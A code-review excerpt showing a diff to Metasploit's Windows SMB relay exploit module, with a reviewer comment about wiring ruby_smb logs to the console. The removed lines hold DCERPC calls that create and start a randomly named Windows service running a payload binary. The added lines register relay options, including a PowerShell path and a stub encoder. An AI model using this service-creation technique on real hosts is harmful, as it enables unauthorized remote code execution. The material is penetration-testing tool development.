modules/exploits/windows/smb/smb_relay.rb

```diff
@@ -69,678 +77,373 @@ module is not able to clean up after itself. The service and payload
-      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
-        scm_handle = dcerpc.last_response.stub_data[0, 20]
-      end
-    rescue ::Exception => e
-      print_error("Error: #{e}")
-      return
-    end
-
-    ##
-    # CreateServiceW()
-    ##
-
-    servicename = rand_text_alpha(8)
-    displayname = rand_text_alpha(rand(1..32))
-    svc_handle = nil
-    svc_status = nil
-
-    print_status('Creating a new service...')
-    stubdata =
-      scm_handle +
-      NDR.wstring(servicename) +
-      NDR.uwstring(displayname) +
-      NDR.long(0x0F01FF) + # Access: MAX
-      NDR.long(0x00000110) + # Type: Interactive, Own process
-      NDR.long(0x00000003) + # Start: Demand
-      NDR.long(0x00000000) + # Errors: Ignore
-      NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
-      NDR.long(0) + # LoadOrderGroup
-      NDR.long(0) + # Dependencies
-      NDR.long(0) + # Service Start
-      NDR.long(0) + # Password
-      NDR.long(0) + # Password
-      NDR.long(0) + # Password
-      NDR.long(0)   # Password
-    begin
-      response = dcerpc.call(0x0c, stubdata)
-      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
-        svc_handle = dcerpc.last_response.stub_data[0, 20]
-        svc_status = dcerpc.last_response.stub_data[24, 4]
-      end
-    rescue ::Exception => e
-      print_error("Error: #{e}")
-      return
-    end
-
-    ##
-    # CloseHandle()
-    ##
-    print_status('Closing service handle...')
-    begin
-      response = dcerpc.call(0x0, svc_handle)
-    rescue ::Exception
-    end
+    register_advanced_options(
+      [
+        OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),
+        OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),
+        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
+        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])
+      ]
+    )
 
-    ##
-    # OpenServiceW
-    ##
-    print_status('Opening service...')
-    begin
-      stubdata =
-        scm_handle +
-        NDR.wstring(servicename) +
-        NDR.long(0xF01FF)
-
-      response = dcerpc.call(0x10, stubdata)
-      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
-        svc_handle = dcerpc.last_response.stub_data[0, 20]
-      end
-    rescue ::Exception => e
-      print_error("Error: #{e}")
-      return
-    end
+    deregister_options('RPORT', 'RHOSTS', 'SMBPass', 'SMBUser')
+  end
 
-    ##
-    # StartService()
-    ##
-    print_status('Starting the service...')
-    stubdata =
-      svc_handle +
-      NDR.long(0) +
-      NDR.long(0)
-    begin
-      response = dcerpc.call(0x13, stubdata)
-      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
+  module RubySmbAdapter
```

Comment:
This framework<->ruby_smb log adapter code will most likely live elsewhere in the future, just wanted an initial implementation so I could wire up ruby_smb's logs to the console or framework's logs